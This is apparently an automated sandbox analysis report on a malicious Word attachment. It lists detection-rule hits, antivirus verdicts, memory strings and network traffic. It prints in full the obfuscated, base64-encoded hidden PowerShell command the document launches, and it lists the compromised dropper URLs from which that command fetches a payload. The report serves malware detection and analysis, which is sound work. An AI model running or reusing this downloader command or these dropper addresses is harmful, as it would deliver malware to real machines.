MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.345480292.000001924A410000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x2ba:$s1: POwersheLL
00000005.00000002.340406464.0000019232AD8000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x658c:$s1: POwersheLL
  • 0xa2cc:$s1: POwersheLL
  • 0xf2ae:$s1: POwersheLL
00000005.00000002.340509636.0000019232B22000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x6cf4:$s1: POwersheLL
  • 0xaa34:$s1: POwersheLL
  • 0xfa16:$s1: POwersheLL
00000005.00000002.341303023.0000019232EE5000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x500:$s1: POwersheLL
  • 0x448e:$s1: PowerShell
  • 0x448e:$sr1: PowerShell
  • 0x448e:$sn3: PowerShell
00000005.00000003.262229379.000001924A61C000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x480:$s1: POwersheLL
  • 0x84a0:$s1: POwersheLL
Click to see the 13 entries

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJwArACcAZABlACcAKQArACgAKAAnAHMAcQAnACsAJwBxACkAKABzA

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKAvira URL Cloud: Label: malware
Source: https://giatot365.com/wp-content/uploads/2020/Sx/Avira URL Cloud: Label: malware
Source: https://www.calltorepair.com/wp-content/themes/thefox/style.cssAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo-300x115.pngAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/blog/Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/project/world-business/Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/includes/Flexslider/flexslider.cssAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/includes/zilla-likes/styles/zilla-likes.cssAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/includes/prettyPhoto/css/prettyPhoto.cssAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.pngAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-json/Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/uploads/2021/01/big_mob_logo-1.pngAvira URL Cloud: Label: phishing
Source: http://cherkashchanu.com/Z:/4ZE8/Avira URL Cloud: Label: malware
Source: https://www.calltorepair.com/wp-content/themes/thefox/js/html5.jsAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rs6.min.jsAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreatuAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/css/animations.cssAvira URL Cloud: Label: phishing
Source: http://tongdaihanoi.com/847346324234234/rpnvXm/Avira URL Cloud: Label: malware
Source: https://www.calltorepair.com/project/luv-summer/Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.jsAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/css/thefox_js_composer.cssAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-admin/admin-ajax.phpAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/xmlrpc.php?rsdAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/about-us/Avira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/css/rs6.cssAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-content/themes/thefox/style_end.cssAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/wp-includes/css/dist/block-library/style.min.cssAvira URL Cloud: Label: phishing
Source: https://www.calltorepair.com/project/great-project/Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URLShow sources
Source: calltorepair.comVirustotal: Detection: 9%Perma Link
Source: giatot365.comVirustotal: Detection: 8%Perma Link
Source: opheliasbrewery.comVirustotal: Detection: 13%Perma Link
Source: xuanthinhshop.comVirustotal: Detection: 9%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Adjunto K_23165.docVirustotal: Detection: 69%Perma Link
Source: Adjunto K_23165.docMetadefender: Detection: 54%Perma Link
Source: Adjunto K_23165.docReversingLabs: Detection: 85%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 107.180.2.185:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 107.180.2.185:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000003.336147480.000001924A3A2000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbn source: powershell.exe, 00000005.00000003.336147480.000001924A3A2000.00000004.00000001.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000003.335909907.000001924A3DA000.00000004.00000001.sdmp
Source: winword.exeMemory has grown: Private usage: 0MB later: 88MB
Source: global trafficDNS query: name: cherkashchanu.com
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 103.28.39.103:443
Source: global trafficTCP traffic: 192.168.2.5:49720 -> 185.104.45.33:80

Networking:

barindex
Potential dropper URLs found in powershell memoryShow sources
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in memory: <div id="logo_img"><a href="https://www.calltorepair.com"><img class="dark_logo desktop_logo" src="https://www.calltorepair.com/wp-content/uploads/2021/01/logo_v_low.png" alt="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies" title="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies"/><img class="white_logo desktop_logo" src="https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png" alt="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies" title="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies"/><img class="dark_logo mobile_logo" src="https://www.calltorepair.com/wp-content/uploads/2021/01/logo_v_low.png" alt="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies" title="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies"/><img class="white_logo mobile_logo" src="https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png" alt="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies" title="Call To Repair &#8211; iPhone, iPad, Laptops &amp; Computer repair &#8211; Accessories &amp; Supplies"/></a></div>
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in memory: http://opheliasbrewery.com/wp-includes/ciAjcgj/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in memory: http://tongdaihanoi.com/847346324234234/rpnvXm/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in memory: http://cherkashchanu.com/Z:/4ZE8/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in memory: https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in memory: https://calltorepair.com/assets/09erZFF/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in memory: http://servicios.semperti.com/wp-admin/2IyZE7k/
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in memory: https://giatot365.com/wp-content/uploads/2`
Source: global trafficHTTP traffic detected: GET /Z:/4ZE8/ HTTP/1.1Host: cherkashchanu.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /847346324234234/rpnvXm/ HTTP/1.1Host: tongdaihanoi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/ciAjcgj/ HTTP/1.1Host: opheliasbrewery.comConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox ViewASN Name: UKRAINE-ASUA UKRAINE-ASUA
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /Z:/4ZE8/ HTTP/1.1Host: cherkashchanu.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /847346324234234/rpnvXm/ HTTP/1.1Host: tongdaihanoi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/ciAjcgj/ HTTP/1.1Host: opheliasbrewery.comConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: <div id="yt"> <a href="https://www.youtube.com/channel/UC9vlmpCi8mAWSIwah-4A6PA/featured" target="_blank"><i class="fa fa-youtube"></i></a></div> equals www.youtube.com (Youtube)
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: <div id="facebook"> <a href="https://www.facebook.com/calltorepairllc/" target="_blank" ><i class="fa fa-facebook"></i></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: <div id="facebook"> <a href="https://www.facebook.com/calltorepairllc/" target="_blank" ><i class="fa fa-facebook"></i></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: <div class="widget rd_social_widget"><h2>Social Icons</h2><div class="sc_small_line widget_line"><span class="small_l_left"></span></div><div class='thefox_social_widget'><div class='thefox_social_widget_text'>Follow Us</div><div class='thefox_social_widget_icons clearfix'> <div id="facebook"> <a href="https://www.facebook.com/calltorepairllc/" target="_blank" ><i class="fa fa-facebook"></i></a></div> equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: cherkashchanu.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Mar 2021 13:27:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Httpd: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache: HITData Raw: 31 34 36 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63
Source: powershell.exe, 00000005.00000002.344901691.000001924A308000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000005.00000002.340869537.0000019232CB2000.00000004.00000001.sdmpString found in binary or memory: http://calltorepair.com
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
Source: powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpString found in binary or memory: http://cherkashchanu.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: http://cherkashchanu.com/Z:/4ZE8/
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000005.00000002.344901691.000001924A308000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000005.00000003.336075677.000001924A330000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-2514.crl0
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: powershell.exe, 00000005.00000002.344901691.000001924A308000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000005.00000002.340780682.0000019232C21000.00000004.00000001.sdmpString found in binary or memory: http://giatot365.com
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: http://opheliasbrewery.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: http://opheliasbrewery.com/wp-includes/ciAjcgj/
Source: powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000005.00000002.337858164.00000192321F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.340746697.0000019232BF7000.00000004.00000001.sdmpString found in binary or memory: http://servicios.sempeX
Source: powershell.exe, 00000005.00000002.340589263.0000019232B6E000.00000004.00000001.sdmpString found in binary or memory: http://servicios.semperti
Source: powershell.exe, 00000005.00000002.338722577.00000192326F9000.00000004.00000001.sdmpString found in binary or memory: http://servicios.semperti.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: http://servicios.semperti.com/wp-admin/2IyZE7k/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: http://themeforest.net/user/tranmautritam?ref=tranmautritam
Source: powershell.exe, 00000005.00000002.340869537.0000019232CB2000.00000004.00000001.sdmpString found in binary or memory: http://tongdaihanoi.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: http://tongdaihanoi.com/847346324234234/rpnvXm/
Source: powershell.exe, 00000005.00000002.340869537.0000019232CB2000.00000004.00000001.sdmp, Ppnq9j.dll.5.drString found in binary or memory: http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: http://tongdaihanoi.comx
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.340869537.0000019232CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.calltorepair.com
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: http://xuanthinhshop.com
Source: powershell.exe, 00000005.00000002.338722577.00000192326F9000.00000004.00000001.sdmpString found in binary or memory: https://adm.tools/support/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.aadrm.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.cortana.ai
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.office.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.onedrive.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://augloop.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://augloop.office.com/v2
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: powershell.exe, 00000005.00000002.340831302.0000019232C47000.00000004.00000001.sdmpString found in binary or memory: https://calltorepair.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: https://calltorepair.com/assets/09erZFF/
Source: powershell.exe, 00000005.00000002.338922062.000001923272C000.00000004.00000001.sdmpString found in binary or memory: https://calltorepair.comx
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cdn.entity.
